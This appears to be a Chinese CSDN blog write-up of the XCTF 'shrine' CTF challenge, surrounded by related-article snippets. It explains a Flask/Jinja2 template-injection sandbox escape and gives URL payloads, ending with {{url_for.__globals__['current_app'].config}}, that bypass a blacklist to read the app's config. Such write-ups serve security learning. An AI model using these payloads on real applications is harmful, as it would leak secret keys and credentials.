Web(shrine)

最新推荐文章于 2024-06-14 09:24:52 发布
最新推荐文章于 2024-06-14 09:24:52 发布
阅读量72 收藏
点赞数
分类专栏: CTF(攻防世界) 文章标签: 前端
原文链接:https://blog.csdn.net/qq_42812036/article/details/104324923
版权

题目描述如下:

这是一段python代码,直接查看页面源代码。

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>') //描述路径
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')  //把括号过滤
        blacklist = ['config', 'self']       //config和self为黑名单
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

 根据shrine的路径,构建payload:http://111.200.241.244:53756/shrine/%7B%7B2+2%7D%7D即(靶机IP地址/shine/{{2+2}}),确认存在模板注入。

常规的想法, 利用{undefined{config}}查看app.config内容,但源代码中过滤了config。

因此构建其他payload: http://111.200.241.244:53756/shrine/%7B%7Burl_for.__globals__%7D%7D,采用{{url_for.__globals__}}

 

{{url_for.__globals__['current_app'].config}}

 

 

BRAVE_YAYA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Webshrine
Light_inthe_eyes的博客
10-16 134
打开页面后,是一段代码: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinj
Flask路由总结 @app.route(‘/‘)
热门推荐
一行一生
10-08 2万+
Hello World 程序员的经典学习方法,从Hello World开始。不要忘了,先安装python, pip,然后运行pip install Flask,环境就装好了。当然本人还是强烈建议使用virtualenv来安装环境。细节就不多说了,让我们写个Hello World吧: from flask import Flask app = Flask(__name__) @app.rou...
Flask和@app.route(1)
01-28 7366
本文我们先来说说Flask,深入探讨Flask如何实现在函数上方写“@app.route()”就能在因特网上输出函数的执行结果。下面是Flask主页给我们的第一个例子,我们现在就由它入手,深入理解“@app.route()”是如何工作的。 app = Flask(__name__)@app.route("/") def hello(): return "Hello World!"@app.r
【学习笔记18】buu [WesternCTF2018]shrine
weixin_43553654的博客
05-18 402
打开网站,查看源码看到下面的一串代码 import flask//flask模板,首先就想到了想到了之前我写的一篇flask模板ssti逃逸 import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG')//注册了一个名为FLAG的config,这里基本可以确定是flag。 @app.route('...
攻防世界--Web进阶--Shrine--flask模板注入--全局变量Current-app--沙盒逃逸
z2560088的博客
10-11 1905
查看项目源码 代码审计 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def saf...
BUUCTF WEB SHRINE
qq_41696858的博客
12-23 372
依然是经典代码审计: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @ app.route('/') def index(): return open(__file__).read() @ app.route('/shrine/') def shrine(shrine): def safe_jinja(s): s = s.replace(
攻防世界-web shrine
m0_48108919的博客
02-12 2340
代码分析: import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #flag的位置,需要查看的目标 @app.route('/') #路由:解析url,访问/路径时就执行index() def index(): return open(__file__).read() #读取文件 @app.route('/shrine/') def shrin...
[XCTF] web shrine
0of_blog
05-22 224
打开靶场,一眼看,是个flask框架,shrine函数接受了一个shrine参数交给flask的模板渲染器, import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<pat...
react-shrine:使用React构建的“ Shrine”渐进式Web应用程序示例
02-05
该项目是通过。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 更新到新版本 Create React App分为两个包: create-react-app是用于创建新项目的全局命令行实用程序。...
web3swift:Swift中的优雅Web3js功能。 本机ABI解析和智能合约交互
02-05
:spider_web: 以太坊名称服务(ENS)支持-一种安全且分散的方式,可使用简单易读的名称来处理区块链内外的资源 :counterclockwise_arrows_button: 智能合约交互(读/写) :shinto_shrine: Infura支持,patial ...
shrine-rails-example:使用Shrine gem的示例应用程序
03-10
直接上传和后台也具有性能优势,因为您的应用程序不必接收文件上传(因为文件直接上传到S3),并且Web工作人员不会被处理,存储或删除所阻止。 执行 该演示可以将文件直接上传到S3(生产中的默认设置),也可以将...
the-shrine-ng:a复古音板的渐进式Web应用程序。 神社带有“古德·劳恩!” 还有更多传奇般的声音:speaker_high_volume:
02-05
二十一世纪神社 但为什么? 好吧: 由于技术的进步,保存免于成为历史。 让每个人都为该项目做出贡献。 保留原汁原味的设计(暂时),但使其在小屏幕上可用。 允许它离线使用。...# build for producti
Shrine_e_commerce:神社,电子商务应用程序,Google Codelab MDC
05-09
MDC也可用于Android,iOS和Web。 入门 要获得Flutter入门方面的帮助,请查看在线。 相关的代码实验室可以在以下位置找到: MDC-101: MDC-102: MDC-103: MDC-104: 屏风 你需要什么 Flutter SDK 带有Flutter...
[Vue-常见错误]浏览器显示Uncaught runtime errors
一个喜欢什么都研究一下的小小后端程序员
06-09 346
在vue.config.js中配置关闭Uncaught runtime errors显示。
JS中一个dom元素能绑定多少事件
ggq53219的博客
06-10 508
在JavaScript中,一个DOM元素可以绑定的事件数量并没有明确的限制,这主要取决于浏览器的实现和内存限制。然而,在实际应用中,为同一个DOM元素绑定过多的事件监听器可能会导致性能问题,尤其是在事件处理函数执行复杂操作的情况下。总之,虽然JavaScript中DOM元素可以绑定的事件数量没有明确的限制,但在实际应用中应注意避免过度绑定和优化事件处理函数,以确保良好的性能和用户体验。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 234
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
vue3如何定义一个组件
Java程序员专栏
06-09 531
注意在子组件的 <template> 中,你使用 {{ propName }} 来显示传递进来的参数值。在父组件中,你使用 :propName="parentMessage" 来将 parentMessage 数据的值绑定到子组件的 propName prop 上。当使用 <script setup> 语法糖时,你不能直接在 <script> 标签内使用 props 选项。在 Vue 3 中,定义一个可以接收参数的组件通常是通过在组件的 props 选项中定义这些参数来完成的。// 其他组件逻辑...
Web前端设计大赛:创意与技术的碰撞
huejiaqwerty888的博客
06-12 317
在这场竞赛中,参赛者们不仅需要展现出独特的创意,还需要运用精湛的技术将创意转化为实际作品。本文将从四个方面、五个方面、六个方面和七个方面,深入剖析Web前端设计大赛的魅力和挑战。交互设计是Web前端设计的核心环节。参赛者需要关注页面的加载速度、响应速度以及操作的便捷性等方面,确保用户在使用过程中能够获得良好的体验。参赛者需要敢于突破传统的设计理念和技术限制,尝试新的设计手法和技术应用。参赛者需要在创意构思、视觉呈现、交互设计、用户体验、技术实现、性能优化以及创新性和可实践性等方面进行全面考虑和精心打造。
js轮播图有,移入移出事件,左右滑动事件功能
最新发布
tianxianghuiwei的博客
06-14 132
具体的轮播可以根据需求进行调整;
web前端拖拽工具:探索其复杂性、困惑度与爆发度
liyrbtqe_66w的博客
06-12 267
综上所述,Web前端拖拽工具虽然带来了便捷和效率,但同时也伴随着一定的复杂性、困惑度和挑战。对于开发者来说,深入了解拖拽工具的技术原理和应用场景,掌握其使用方法和优化技巧,是提升开发效率和降低项目风险的关键所在。然而,在实际项目中,由于项目需求、技术栈以及团队协作等多种因素的影响,开发者可能会遇到各种复杂的问题和挑战。然而,随着功能的增多和复杂化,开发者在使用拖拽工具时可能会遇到一些困惑和挑战。同时,随着Web组件化、模块化等趋势的普及,拖拽工具也可能会朝着更加标准化、可复用的方向发展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值